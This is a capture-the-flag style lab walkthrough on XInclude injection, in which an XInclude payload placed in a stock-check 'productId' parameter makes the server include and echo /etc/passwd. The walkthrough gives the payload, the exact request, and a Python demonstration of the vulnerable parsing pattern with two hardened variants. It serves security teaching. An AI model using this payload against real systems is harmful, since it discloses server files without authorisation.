# Exploiting XInclude to retrieve files

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2F8CoJ4VEqInyW7BZPFOYF%2Fimage.png?alt=media&#x26;token=a3182909-daf1-4664-9b72-3cf23776ddea" alt=""><figcaption></figcaption></figure></div>

## <mark style="color:red;">Exploitation</mark>

The lab has a "Check stock" feature that sends `productId` and `storeId` parameters to the server, where they are parsed as part of an XML document.

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2FSvZ1q2eLDQqbAT3WDhgI%2Fimage.png?alt=media&#x26;token=813cffcd-0384-440b-be12-3a754db1b707" alt=""><figcaption></figcaption></figure></div>

Intercept the stock-check request and send it to Repeater.

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2FyvdFM2OBIb0QidXADuN9%2Fimage.png?alt=media&#x26;token=557bb1e8-6b98-4bdc-a5e3-09afabe9070a" alt=""><figcaption></figcaption></figure></div>

This application **receives client-submitted data, embeds it on the server side into an XML document, and then parses that document**.

In this situation you cannot carry out a classic XXE attack: you don't control the entire XML document, only a value inside it, so you cannot define or modify a `DOCTYPE` and therefore cannot declare an external entity. However, you may be able to use `XInclude` instead.

`XInclude` is a W3C specification that lets an XML document be assembled from sub-documents. Unlike an entity declaration, an `XInclude` directive is an ordinary element, so it can be placed in any data value of the document. The attack therefore works in situations where you control only a single item of data that the server embeds into its own XML document, provided the server's parser performs XInclude processing.

To perform an `XInclude` attack, you declare the `XInclude` namespace and provide the path of the file you want to include. The `parse="text"` attribute matters: `/etc/passwd` is not well-formed XML, so with the default `parse="xml"` the inclusion would fail. For example:

```markup
<foo xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/></foo>
```
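To make the server-side behaviour concrete, the following added example (not part of the original walkthrough and not the lab's own code) reproduces the vulnerable pattern in Python: untrusted `productId` input is interpolated into a server-built XML document, and the document is then parsed with XInclude processing enabled via the standard library's `xml.etree.ElementInclude`. It shows the same payload against three server configurations: the vulnerable one, one where XInclude processing is simply never invoked, and one where the untrusted value is escaped before embedding. The secret file is a constructed stand-in for `/etc/passwd`; Python's default `ElementInclude` loader opens `href` as a local filesystem path rather than a `file:///` URI, so the example uses a plain path.

```python
import os
import tempfile
import xml.etree.ElementTree as ET
from xml.etree import ElementInclude
from xml.sax.saxutils import escape

XI_NS = "http://www.w3.org/2001/XInclude"


def build_stock_check_xml(product_id: str, store_id: str) -> str:
    """Vulnerable pattern (assumed, modelled on the lab): the server wraps the
    client's values in its own XML via raw string interpolation. The client
    never controls the prolog, so no DOCTYPE / classic XXE is possible."""
    return (
        "<stockCheck>"
        f"<productId>{product_id}</productId>"
        f"<storeId>{store_id}</storeId>"
        "</stockCheck>"
    )


def build_stock_check_xml_safe(product_id: str, store_id: str) -> str:
    """Hardened: escape() turns '<' into '&lt;' etc., so an xi:include sent by
    the client is parsed as character data, not as an element."""
    return (
        "<stockCheck>"
        f"<productId>{escape(product_id)}</productId>"
        f"<storeId>{escape(store_id)}</storeId>"
        "</stockCheck>"
    )


def xinclude_payload(path: str) -> str:
    """The walkthrough's payload, parameterised on the target path.
    parse="text" is required because the target is not well-formed XML."""
    return f'<foo xmlns:xi="{XI_NS}"><xi:include parse="text" href="{path}"/></foo>'


def parse_xinclude_aware(xml_text: str) -> ET.Element:
    """Unsafe configuration: parse, then expand every xi:include in the tree.
    ElementInclude's default loader reads the href from the local filesystem."""
    root = ET.fromstring(xml_text)
    ElementInclude.include(root)
    return root


def parse_xinclude_unaware(xml_text: str) -> ET.Element:
    """Same parser, XInclude processing never invoked: xi:include stays inert."""
    return ET.fromstring(xml_text)


def product_id_text(root: ET.Element) -> str:
    """All text the server would see as the productId value (own text plus
    descendant text), which is what gets reflected in an error message."""
    return "".join(root.find("productId").itertext())


def run_demo() -> dict:
    """Run the same payload through the three configurations and return what
    each one yields as the productId value."""
    # Constructed secret file standing in for /etc/passwd.
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as fh:
        fh.write("root:x:0:0:root:/root:/bin/bash\n")
        secret_path = fh.name
    try:
        payload = xinclude_payload(secret_path)
        vulnerable = product_id_text(
            parse_xinclude_aware(build_stock_check_xml(payload, "1")))
        xinclude_disabled = product_id_text(
            parse_xinclude_unaware(build_stock_check_xml(payload, "1")))
        input_escaped = product_id_text(
            parse_xinclude_aware(build_stock_check_xml_safe(payload, "1")))
        return {
            "payload": payload,
            "vulnerable": vulnerable,            # file contents leak
            "xinclude_disabled": xinclude_disabled,  # empty: nothing was read
            "input_escaped": input_escaped,      # the literal payload, as text
        }
    finally:
        os.unlink(secret_path)


if __name__ == "__main__":
    for name, value in run_demo().items():
        print(f"{name}: {value!r}")
```

The two hardening paths are independent: escaping the input stops the `xi:include` from ever becoming an element, and leaving XInclude processing off (in Python, never calling `ElementInclude.include`) means an `xi:include` element that does get in is never resolved. A robust server does both.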

So go back to the "Check stock" request in Repeater and replace the `productId` value with the XInclude payload (if the server rejects the raw request, URL-encode the payload first; Ctrl+U in Repeater encodes the selected text):

```markup
productId=<foo xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///etc/passwd"/></foo>&storeId=1
```

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2FAJQayMeTer510CDyiG8T%2Fimage.png?alt=media&#x26;token=e2ffb0eb-3e86-4661-865e-49741001dd34" alt=""><figcaption></figcaption></figure></div>

The response reflects the contents of `/etc/passwd` in the error message, and the lab is solved.

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2FxJVt2U9PCrSxAQz7ZmHC%2Fimage.png?alt=media&#x26;token=547c0a16-6311-4667-ad68-90827bfb180b" alt=""><figcaption></figcaption></figure></div>

I hope you found this walkthrough easy to understand and follow.

Greetings from [<mark style="color:red;">**Sayonara**</mark>](https://github.com/ismail-arame)
